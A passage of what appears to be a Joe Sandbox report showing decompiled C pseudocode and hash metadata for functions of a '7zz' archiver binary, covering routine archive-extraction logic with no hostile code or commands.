										 *(_t246 + 0x1cc) =  *(_t255 - 0x10);
										_t148 = E0046B1C0( *((intOrPtr*)(_t255 - 0x28)), _t232);
										__eflags = _t148 -  *((intOrPtr*)(_t255 - 0x48));
										if(_t148 !=  *((intOrPtr*)(_t255 - 0x48))) {
											E0042D0F8(_t208);
										}
										 *(_t255 - 0x50) =  *(_t255 - 0x50) & 0x00000000;
										 *(_t255 - 4) = 1;
										E0042D093(_t252, _t255 - 0x30);
										 *((intOrPtr*)(_t255 - 0x40)) = 0;
										 *(_t255 - 0x3c) = 0;
										 *((intOrPtr*)(_t255 - 0x38)) = 0;
										 *((intOrPtr*)(_t255 - 0x34)) = 4;
										 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
										_t210 =  *((intOrPtr*)(_t252 + 0x18));
										 *(_t255 - 4) = 2;
										_t152 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
										__eflags = _t152 - 1;
										if(_t152 != 1) {
											L39:
											__eflags = _t152 - 0x17;
											if(_t152 != 0x17) {
												L41:
												E0042D0F8(_t210);
												L42:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												_t211 = _t252;
												_push( *((intOrPtr*)(_t255 + 0xc)));
												_push(_t255 - 0x44);
												_push(_t246 + 0x150);
												_push( *((intOrPtr*)(_t246 + 0x144)));
												_push( *((intOrPtr*)(_t246 + 0x140)));
												_t156 = E0042E01C(_t252, _t232, __eflags); // executed
												__eflags = _t156;
												if(_t156 == 0) {
													__eflags =  *(_t255 - 0x3c);
													if( *(_t255 - 0x3c) != 0) {
														__eflags =  *(_t255 - 0x3c) - 1;
														if( *(_t255 - 0x3c) > 1) {
															E0042D0F8(_t211);
														}
														E0042CFE5(_t255 - 0x54);
														E0042D093(_t252,  *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x38)))));
														_t214 =  *((intOrPtr*)(_t252 + 0x18));
														_t160 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
														__eflags = _t160 - 1;
														if(_t160 != 1) {
															L50:
															E0042D0F8(_t214);
															goto L51;
														} else {
															__eflags = _t232;
															if(_t232 == 0) {
																goto L51;
															}
															goto L50;
														}
													}
													 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
													 *(_t255 - 4) = 4;
													_t254 = 0;
													goto L53;
												}
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 3;
												goto L52;
											}
											__eflags = _t232;
											if(__eflags == 0) {
												goto L42;
											}
											goto L41;
										} else {
											__eflags = _t232;
											if(_t232 == 0) {
												L51:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												 *((intOrPtr*)(_t246 + 0x1c0)) =  *((intOrPtr*)(_t252 + 0x48));
												_push( *((intOrPtr*)(_t255 + 0xc)));
												 *((intOrPtr*)(_t246 + 0x1c4)) =  *((intOrPtr*)(_t252 + 0x4c));
												_push(_t246);
												_t156 = E0042E3B2(_t252, _t232);
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 5;
												L52:
												_t254 = _t156;
												L53:
												E0040862D();
												 *(_t255 - 4) = 1;
												E00408604(_t255 - 0x44);
												_t123 = _t255 - 4;
												 *_t123 =  *(_t255 - 4) & 0x00000000;
												__eflags =  *_t123;
												E0042CFE5(_t255 - 0x54);
												L54:
												 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
												E00407A18( *((intOrPtr*)(_t255 - 0x28)));
												_t143 = _t254;
												goto L55;
											}
											goto L39;
										}
									}
									_t254 = _t146;
									goto L54;
								}
								if(__eflags < 0) {
									goto L31;
								}
								__eflags = _t244;
								if(_t244 >= 0) {
									goto L32;
								}
								goto L31;
							}
							_t143 = 0;
							goto L55;
						}
					}
					goto L55;
				}
			}


































                                                                      0x0042ec61
                                                                      0x0042ec6f
                                                                      0x0042ec72
                                                                      0x0042ec76
                                                                      0x0042ec7e
                                                                      0x0042ec87
                                                                      0x0042ec90
                                                                      0x0042ec96
                                                                      0x0042ec98
                                                                      0x0042ec9e
                                                                      0x0042eca4
                                                                      0x0042eca6
                                                                      0x0042eca6
                                                                      0x0042ecae
                                                                      0x0042ecb1
                                                                      0x0042ecb7
                                                                      0x0042ecba
                                                                      0x0042ecc3
                                                                      0x0042eccb
                                                                      0x0042ecce
                                                                      0x0042eccf
                                                                      0x0042ecd9
                                                                      0x0042ee08
                                                                      0x0042ee0b
                                                                      0x0042ee0d
                                                                      0x0042ee0d
                                                                      0x00000000
                                                                      0x0042ecfe
                                                                      0x0042ecfe
                                                                      0x0042ed0b
                                                                      0x0042ed10
                                                                      0x0042f013
                                                                      0x0042f019
                                                                      0x0042f021
                                                                      0x0042f021
                                                                      0x0042ed16
                                                                      0x0042ed25
                                                                      0x0042ed2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ed30
                                                                      0x0042ed33
                                                                      0x0042ed38
                                                                      0x0042ed3d
                                                                      0x0042ed40
                                                                      0x0042ed43
                                                                      0x0042ed46
                                                                      0x0042ed4f
                                                                      0x0042ed4f
                                                                      0x0042ed51
                                                                      0x0042ed5f
                                                                      0x0042ed63
                                                                      0x0042ed66
                                                                      0x0042ed68
                                                                      0x0042ed71
                                                                      0x0042ed77
                                                                      0x0042ed7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ed84
                                                                      0x0042ed84
                                                                      0x0042ed89
                                                                      0x0042ee52
                                                                      0x0042ee54
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ed8f
                                                                      0x0042ed8f
                                                                      0x0042ed8f
                                                                      0x0042ed98
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042eda6
                                                                      0x0042edb2
                                                                      0x0042edb3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042edb3
                                                                      0x00000000
                                                                      0x0042eda6
                                                                      0x0042edb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042edc1
                                                                      0x0042edc2
                                                                      0x0042edc7
                                                                      0x0042edd1
                                                                      0x0042edd4
                                                                      0x0042eddc
                                                                      0x0042eddf
                                                                      0x0042ede2
                                                                      0x0042ede5
                                                                      0x0042edf1
                                                                      0x0042edf4
                                                                      0x0042edfc
                                                                      0x0042ee01
                                                                      0x0042ee12
                                                                      0x0042ee18
                                                                      0x0042ee1e
                                                                      0x0042ee21
                                                                      0x0042ee27
                                                                      0x0042ee30
                                                                      0x0042ee33
                                                                      0x0042ee3c
                                                                      0x0042ee40
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ee42
                                                                      0x0042ee46
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ee48
                                                                      0x0042ee4a
                                                                      0x0042ee5a
                                                                      0x0042ee5a
                                                                      0x0042ee65
                                                                      0x0042ee6a
                                                                      0x0042ee6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ee72
                                                                      0x0042ee75
                                                                      0x0042ee78
                                                                      0x0042ee82
                                                                      0x0042ee88
                                                                      0x0042ee95
                                                                      0x0042ee9a
                                                                      0x0042ee9c
                                                                      0x0042eeb0
                                                                      0x0042eeb3
                                                                      0x0042eeb6
                                                                      0x0042eeb9
                                                                      0x0042eec0
                                                                      0x0042eec3
                                                                      0x0042eec8
                                                                      0x0042eecb
                                                                      0x0042eed1
                                                                      0x0042eed4
                                                                      0x0042eeda
                                                                      0x0042eedf
                                                                      0x0042eee2
                                                                      0x0042eee4
                                                                      0x0042eee4
                                                                      0x0042eee9
                                                                      0x0042eef5
                                                                      0x0042eef9
                                                                      0x0042ef05
                                                                      0x0042ef08
                                                                      0x0042ef0b
                                                                      0x0042ef0e
                                                                      0x0042ef15
                                                                      0x0042ef18
                                                                      0x0042ef1b
                                                                      0x0042ef1f
                                                                      0x0042ef24
                                                                      0x0042ef27
                                                                      0x0042ef31
                                                                      0x0042ef31
                                                                      0x0042ef34
                                                                      0x0042ef3a
                                                                      0x0042ef3a
                                                                      0x0042ef3f
                                                                      0x0042ef3f
                                                                      0x0042ef45
                                                                      0x0042ef47
                                                                      0x0042ef4a
                                                                      0x0042ef51
                                                                      0x0042ef52
                                                                      0x0042ef58
                                                                      0x0042ef5e
                                                                      0x0042ef63
                                                                      0x0042ef65
                                                                      0x0042ef70
                                                                      0x0042ef74
                                                                      0x0042ef81
                                                                      0x0042ef85
                                                                      0x0042ef87
                                                                      0x0042ef87
                                                                      0x0042ef8f
                                                                      0x0042ef9d
                                                                      0x0042efa2
                                                                      0x0042efa5
                                                                      0x0042efaa
                                                                      0x0042efad
                                                                      0x0042efb3
                                                                      0x0042efb3
                                                                      0x00000000
                                                                      0x0042efaf
                                                                      0x0042efaf
                                                                      0x0042efb1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042efb1
                                                                      0x0042efad
                                                                      0x0042ef76
                                                                      0x0042ef79
                                                                      0x0042ef7d
                                                                      0x00000000
                                                                      0x0042ef7d
                                                                      0x0042ef67
                                                                      0x0042ef6a
                                                                      0x00000000
                                                                      0x0042ef6a
                                                                      0x0042ef36
                                                                      0x0042ef38
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ef29
                                                                      0x0042ef29
                                                                      0x0042ef2b
                                                                      0x0042efb8
                                                                      0x0042efb8
                                                                      0x0042efbe
                                                                      0x0042efc7
                                                                      0x0042efcc
                                                                      0x0042efd2
                                                                      0x0042efd3
                                                                      0x0042efd8
                                                                      0x0042efdb
                                                                      0x0042efdf
                                                                      0x0042efdf
                                                                      0x0042efe1
                                                                      0x0042efe4
                                                                      0x0042efec
                                                                      0x0042eff0
                                                                      0x0042eff5
                                                                      0x0042eff5
                                                                      0x0042eff5
                                                                      0x0042effc
                                                                      0x0042f001
                                                                      0x0042f004
                                                                      0x0042f00b
                                                                      0x0042f011
                                                                      0x00000000
                                                                      0x0042f011
                                                                      0x00000000
                                                                      0x0042ef2b
                                                                      0x0042ef27
                                                                      0x0042ee9e
                                                                      0x00000000
                                                                      0x0042ee9e
                                                                      0x0042ee4c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ee4e
                                                                      0x0042ee50
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ee50
                                                                      0x0042ee35
                                                                      0x00000000
                                                                      0x0042ee35
                                                                      0x0042ee03
                                                                      0x00000000
                                                                      0x0042ed68

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: c[@
                                                                      • API String ID: 3519838083-2588109156
                                                                      • Opcode ID: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
                                                                      • Instruction ID: bcf0ec3d1ae188e7939240ae46176005842349514c47eef13008c3777b72f97c
                                                                      • Opcode Fuzzy Hash: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
                                                                      • Instruction Fuzzy Hash: A3C19D70B00219AFDF24CFA6D980BEEBBB1BF48304F64442EE405A7341DB79A945CB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042E01C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E0042E01C(intOrPtr* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _t192;
				intOrPtr* _t198;
				intOrPtr _t203;
				void* _t221;
				void* _t228;
				intOrPtr _t269;
				signed int _t273;
				intOrPtr* _t275;
				intOrPtr* _t279;
				intOrPtr* _t281;
				intOrPtr* _t285;
				void* _t286;
				void* _t291;

				_t291 = __eflags;
				_t273 = __edx;
				E0046B890(E004775CD, _t286);
				_t275 = __ecx;
				E00404AD0(_t286 - 0x5c, 8);
				 *((intOrPtr*)(_t286 - 0x5c)) = 0x47a688;
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				E00404AD0(_t286 - 0xd8, 1);
				 *((intOrPtr*)(_t286 - 0xd8)) = 0x47ab08;
				E00404AD0(_t286 - 0xc4, 4);
				 *((intOrPtr*)(_t286 - 0xc4)) = 0x47ab80;
				 *(_t286 - 4) = 2;
				E00405B9F(_t286 - 0x30);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				E00404AD0(_t286 - 0x84, 4);
				 *((intOrPtr*)(_t286 - 0x84)) = 0x47ab80;
				E00404AD0(_t286 - 0x9c, 8);
				 *((intOrPtr*)(_t286 - 0x9c)) = 0x47a688;
				E00404AD0(_t286 - 0xb0, 1);
				 *((intOrPtr*)(_t286 - 0xb0)) = 0x47ab08;
				E00404AD0(_t286 - 0x70, 4);
				 *((intOrPtr*)(_t286 - 0x70)) = 0x47ab80;
				_t279 =  *((intOrPtr*)(_t286 + 0x10));
				 *(_t286 - 4) = 7;
				E0042DE7C(__ecx, __edx, 0, _t279, _t286 - 0x5c, _t286 - 0xd8, _t286 - 0xc4, _t286 - 0x30, _t286 - 0x84, _t286 - 0x9c, _t286 - 0xb0, _t286 - 0x70);
				 *(_t286 - 0x14) =  *(_t286 - 0x14) & 0x00000000;
				E00426448(_t286 - 0x164, _t291, 1);
				_t228 =  *_t279 +  *((intOrPtr*)(_t286 + 8));
				asm("adc esi, [ebp+0xc]");
				 *(_t286 + 0xc) =  *(_t286 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t286 - 0x34)) =  *((intOrPtr*)(_t279 + 4));
				if( *((intOrPtr*)(_t286 - 0x28)) <= 0) {
					L17:
					 *(_t286 - 4) = 7;
					E00429925(_t286 - 0x164, _t303); // executed
					 *(_t286 - 4) = 6;
					E00408604(_t286 - 0x70);
					 *(_t286 - 4) = 5;
					E00408604(_t286 - 0xb0);
					 *(_t286 - 4) = 4;
					E00408604(_t286 - 0x9c);
					 *(_t286 - 4) = 3;
					E00408604(_t286 - 0x84);
					 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
					 *(_t286 - 4) = 0xc;
					_t281 = 0;
					L18:
					E0040862D();
					 *(_t286 - 4) = 2;
					E00408604(_t286 - 0x30);
					 *(_t286 - 4) = 1;
					E00408604(_t286 - 0xc4);
					 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
					E00408604(_t286 - 0xd8);
					 *(_t286 - 4) =  *(_t286 - 4) | 0xffffffff;
					E00408604(_t286 - 0x5c);
					 *[fs:0x0] =  *((intOrPtr*)(_t286 - 0xc));
					return _t281;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t286 - 0x40) =  *(_t286 - 0x40) & 0x00000000;
					 *(_t286 - 0x3c) =  *(_t286 - 0x3c) & 0x00000000;
					 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t286 - 0x24)) +  *(_t286 + 0xc) * 4));
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					_push(_t286 - 0x44);
					 *(_t286 - 4) = 9;
					E0042F129( *((intOrPtr*)(_t286 + 0x14)));
					 *(_t286 - 4) = 8;
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					E00407A18( *(_t286 - 0x3c));
					_t192 =  *((intOrPtr*)(_t286 + 0x14));
					_t284 =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x10) =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x1c) = E00429826( *((intOrPtr*)(_t286 + 0x10)));
					_t257 =  *(_t286 - 0x1c);
					if( *(_t286 - 0x1c) !=  *(_t286 - 0x1c) || 0 != _t273) {
						E0042D0F8(_t257);
					}
					E0040FA26(_t284,  *(_t286 - 0x1c));
					_push(0x14);
					_t198 = E004079F2();
					_t285 = 0;
					if(_t198 != 0) {
						 *((intOrPtr*)(_t198 + 4)) = 0;
						 *_t198 = 0x47b3d0;
						_t285 = _t198;
					}
					_t296 = _t285;
					 *((intOrPtr*)(_t286 - 0x88)) = _t285;
					if(_t285 != 0) {
						 *((intOrPtr*)( *_t285 + 4))(_t285);
					}
					_t273 =  *(_t286 - 0x14);
					 *((intOrPtr*)(_t285 + 8)) =  *((intOrPtr*)( *(_t286 - 0x10) + 8));
					 *((intOrPtr*)(_t285 + 0x10)) = 0;
					 *(_t285 + 0xc) =  *(_t286 - 0x1c);
					 *(_t286 - 4) = 0xa;
					_t203 = E004264F7(_t286 - 0x164, _t273, _t296,  *_t275, _t228,  *((intOrPtr*)(_t286 - 0x34)),  *(_t286 - 0x50) + _t273 * 8,  *((intOrPtr*)(_t286 + 0x10)), _t285, 0,  *((intOrPtr*)(_t286 + 0x18)),  *((intOrPtr*)(_t286 + 0x1c)), 0, 1); // executed
					 *((intOrPtr*)(_t286 - 0x48)) = _t203;
					if(_t203 != 0) {
						break;
					}
					if( *((char*)( *((intOrPtr*)(_t286 + 0x10)) + 0x54)) != 0) {
						_t273 =  *(_t286 - 0x1c);
						_t221 = E0046B1C0( *((intOrPtr*)( *(_t286 - 0x10) + 8)), _t273);
						_t272 =  *((intOrPtr*)(_t286 + 0x10));
						if(_t221 !=  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x50))) {
							E0042D0F8(_t272);
						}
					}
					 *(_t286 - 0x10) =  *(_t286 - 0x10) & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)) <= 0) {
						L14:
						 *(_t286 - 4) = 8;
						if(_t285 != 0) {
							 *((intOrPtr*)( *_t285 + 8))(_t285);
						}
						 *(_t286 + 0xc) =  *(_t286 + 0xc) + 1;
						_t303 =  *(_t286 + 0xc) -  *((intOrPtr*)(_t286 - 0x28));
						if( *(_t286 + 0xc) <  *((intOrPtr*)(_t286 - 0x28))) {
							continue;
						} else {
							goto L17;
						}
					} else {
						do {
							_t273 =  *(_t286 - 0x50);
							 *(_t286 - 0x14) =  *(_t286 - 0x14) + 1;
							_t269 =  *((intOrPtr*)(( *(_t286 - 0x14) << 3) + _t273));
							_t228 = _t228 + _t269;
							asm("adc [ebp-0x34], eax");
							 *((intOrPtr*)(_t275 + 0x48)) =  *((intOrPtr*)(_t275 + 0x48)) + _t269;
							asm("adc [edi+0x4c], eax");
							 *(_t286 - 0x10) =  *(_t286 - 0x10) + 1;
						} while ( *(_t286 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)));
						goto L14;
					}
				}
				__eflags = _t285;
				 *(_t286 - 4) = 8;
				if(__eflags != 0) {
					 *((intOrPtr*)( *_t285 + 8))(_t285);
				}
				 *(_t286 - 4) = 7;
				E00429925(_t286 - 0x164, __eflags);
				 *(_t286 - 4) = 6;
				E00408604(_t286 - 0x70);
				 *(_t286 - 4) = 5;
				E00408604(_t286 - 0xb0);
				 *(_t286 - 4) = 4;
				E00408604(_t286 - 0x9c);
				 *(_t286 - 4) = 3;
				E00408604(_t286 - 0x84);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				_t281 =  *((intOrPtr*)(_t286 - 0x48));
				 *(_t286 - 4) = 0xb;
				goto L18;
			}
















                                                                      0x0042e01c
                                                                      0x0042e01c
                                                                      0x0042e021
                                                                      0x0042e02f
                                                                      0x0042e036
                                                                      0x0042e03b
                                                                      0x0042e042
                                                                      0x0042e04e
                                                                      0x0042e058
                                                                      0x0042e066
                                                                      0x0042e070
                                                                      0x0042e079
                                                                      0x0042e07d
                                                                      0x0042e082
                                                                      0x0042e091
                                                                      0x0042e096
                                                                      0x0042e0a4
                                                                      0x0042e0a9
                                                                      0x0042e0bb
                                                                      0x0042e0c0
                                                                      0x0042e0cb
                                                                      0x0042e0d0
                                                                      0x0042e0d6
                                                                      0x0042e10a
                                                                      0x0042e10e
                                                                      0x0042e113
                                                                      0x0042e11f
                                                                      0x0042e129
                                                                      0x0042e12c
                                                                      0x0042e12f
                                                                      0x0042e137
                                                                      0x0042e13a
                                                                      0x0042e2a3
                                                                      0x0042e2a9
                                                                      0x0042e2ad
                                                                      0x0042e2b5
                                                                      0x0042e2b9
                                                                      0x0042e2c4
                                                                      0x0042e2c8
                                                                      0x0042e2d3
                                                                      0x0042e2d7
                                                                      0x0042e2e2
                                                                      0x0042e2e6
                                                                      0x0042e2eb
                                                                      0x0042e2f2
                                                                      0x0042e2f6
                                                                      0x0042e2f8
                                                                      0x0042e2fb
                                                                      0x0042e303
                                                                      0x0042e307
                                                                      0x0042e312
                                                                      0x0042e316
                                                                      0x0042e31b
                                                                      0x0042e325
                                                                      0x0042e32a
                                                                      0x0042e331
                                                                      0x0042e33e
                                                                      0x0042e346
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042e140
                                                                      0x0042e140
                                                                      0x0042e146
                                                                      0x0042e14a
                                                                      0x0042e156
                                                                      0x0042e159
                                                                      0x0042e162
                                                                      0x0042e163
                                                                      0x0042e167
                                                                      0x0042e16f
                                                                      0x0042e173
                                                                      0x0042e176
                                                                      0x0042e17b
                                                                      0x0042e185
                                                                      0x0042e18c
                                                                      0x0042e194
                                                                      0x0042e199
                                                                      0x0042e19e
                                                                      0x0042e1a4
                                                                      0x0042e1a4
                                                                      0x0042e1ae
                                                                      0x0042e1b3
                                                                      0x0042e1b5
                                                                      0x0042e1ba
                                                                      0x0042e1bf
                                                                      0x0042e1c1
                                                                      0x0042e1c4
                                                                      0x0042e1ca
                                                                      0x0042e1ca
                                                                      0x0042e1cc
                                                                      0x0042e1ce
                                                                      0x0042e1d4
                                                                      0x0042e1d9
                                                                      0x0042e1d9
                                                                      0x0042e1ea
                                                                      0x0042e1ed
                                                                      0x0042e1f6
                                                                      0x0042e1f9
                                                                      0x0042e209
                                                                      0x0042e219
                                                                      0x0042e220
                                                                      0x0042e223
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042e230
                                                                      0x0042e235
                                                                      0x0042e23b
                                                                      0x0042e240
                                                                      0x0042e246
                                                                      0x0042e248
                                                                      0x0042e248
                                                                      0x0042e246
                                                                      0x0042e250
                                                                      0x0042e258
                                                                      0x0042e286
                                                                      0x0042e288
                                                                      0x0042e28c
                                                                      0x0042e291
                                                                      0x0042e291
                                                                      0x0042e294
                                                                      0x0042e29a
                                                                      0x0042e29d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042e25a
                                                                      0x0042e25a
                                                                      0x0042e25d
                                                                      0x0042e263
                                                                      0x0042e266
                                                                      0x0042e26d
                                                                      0x0042e26f
                                                                      0x0042e272
                                                                      0x0042e275
                                                                      0x0042e278
                                                                      0x0042e281
                                                                      0x00000000
                                                                      0x0042e25a
                                                                      0x0042e258
                                                                      0x0042e349
                                                                      0x0042e34b
                                                                      0x0042e34f
                                                                      0x0042e354
                                                                      0x0042e354
                                                                      0x0042e35d
                                                                      0x0042e361
                                                                      0x0042e369
                                                                      0x0042e36d
                                                                      0x0042e378
                                                                      0x0042e37c
                                                                      0x0042e387
                                                                      0x0042e38b
                                                                      0x0042e396
                                                                      0x0042e39a
                                                                      0x0042e39f
                                                                      0x0042e3a6
                                                                      0x0042e3a9
                                                                      0x00000000

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0042E021
                                                                        • Part of subcall function 0042F129: __EH_prolog.LIBCMT ref: 0042F12E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: c[@
                                                                      • API String ID: 3519838083-2588109156
                                                                      • Opcode ID: 37a9ed40db553d9be7e5d6efad5c6be87b7fe848da45eb624cf300f350e8dd1e
                                                                      • Instruction ID: 13632c0e7c80ea0d0342c65c90266a16cd9ecf8cb86b77326c192e1623b2d142
                                                                      • Opcode Fuzzy Hash: 37a9ed40db553d9be7e5d6efad5c6be87b7fe848da45eb624cf300f350e8dd1e
                                                                      • Instruction Fuzzy Hash: 05C14A70D00268DFDB14DF95D945BEEB7B4BF14308F14809EE909A7291CB786A48CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041003E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E0041003E(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* _t125;
				intOrPtr* _t128;
				void* _t142;
				signed int _t168;
				intOrPtr* _t175;
				intOrPtr _t176;
				signed int _t208;
				void* _t209;
				signed int _t212;
				void* _t218;

				E0046B890(E00474107, _t218);
				 *((intOrPtr*)(_t218 - 0x24)) = __edx;
				E00405B9F(_t218 - 0x38);
				 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
				_t168 = 0;
				 *(_t218 - 4) = 0;
				L14();
				 *(_t218 - 4) = 1;
				E00405B9F(_t218 - 0x20);
				 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
				 *(_t218 - 4) = 2;
				E00404AD0(_t218 - 0x74, 4);
				 *((intOrPtr*)(_t218 - 0x74)) = 0x47a9ac;
				_push(_t218 - 0x74);
				_push(_t218 - 0x20);
				_push(0);
				_t175 = __ecx;
				 *(_t218 - 4) = 3;
				_t125 = E00415349(__ecx, _t218 - 0xc4); // executed
				if(_t125 != 0 ||  *(_t218 - 0x18) > 0) {
					 *(_t218 + 8) = "cannot find archive";
					E0046B8F4(_t218 + 8, 0x47cf70);
					_push(0x47a420);
					_t128 = _t175;
					__eflags = 0;
					_t176 = 4;
					 *((intOrPtr*)(_t128 + 4)) = 0;
					 *((intOrPtr*)(_t128 + 8)) = 0;
					 *((intOrPtr*)(_t128 + 0xc)) = 0;
					 *((intOrPtr*)(_t128 + 0x10)) = _t176;
					 *_t128 = 0x47a420;
					 *((intOrPtr*)(_t128 + 0x18)) = 0;
					 *((intOrPtr*)(_t128 + 0x1c)) = 0;
					 *((intOrPtr*)(_t128 + 0x20)) = 0;
					 *((intOrPtr*)(_t128 + 0x24)) = _t176;
					 *((intOrPtr*)(_t128 + 0x14)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x2c)) = 0;
					 *((intOrPtr*)(_t128 + 0x30)) = 0;
					 *((intOrPtr*)(_t128 + 0x34)) = 0;
					 *((intOrPtr*)(_t128 + 0x38)) = _t176;
					 *((intOrPtr*)(_t128 + 0x28)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x40)) = 0;
					 *((intOrPtr*)(_t128 + 0x44)) = 0;
					 *((intOrPtr*)(_t128 + 0x48)) = 0;
					 *((intOrPtr*)(_t128 + 0x4c)) = _t176;
					 *((intOrPtr*)(_t128 + 0x3c)) = 0x47aa4c;
					return _t128;
				} else {
					 *(_t218 - 4) = 2;
					E00408604(_t218 - 0x74);
					 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
					 *(_t218 - 4) = 4;
					E0040862D();
					 *(_t218 - 4) = 1;
					E00408604(_t218 - 0x20);
					_t208 = 0;
					if( *((intOrPtr*)(_t218 - 0x80)) > 0) {
						do {
							if(( *( *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x7c)) + _t208 * 4)) + 0x2c) >> 0x00000004 & 0x00000001) == 0) {
								_push(E0041528B(_t218 - 0xc4, _t218 - 0x18, _t208));
								 *(_t218 - 4) = 5;
								E00406796(_t218 - 0x38);
								 *(_t218 - 4) = 1;
								E00407A18( *(_t218 - 0x18));
							}
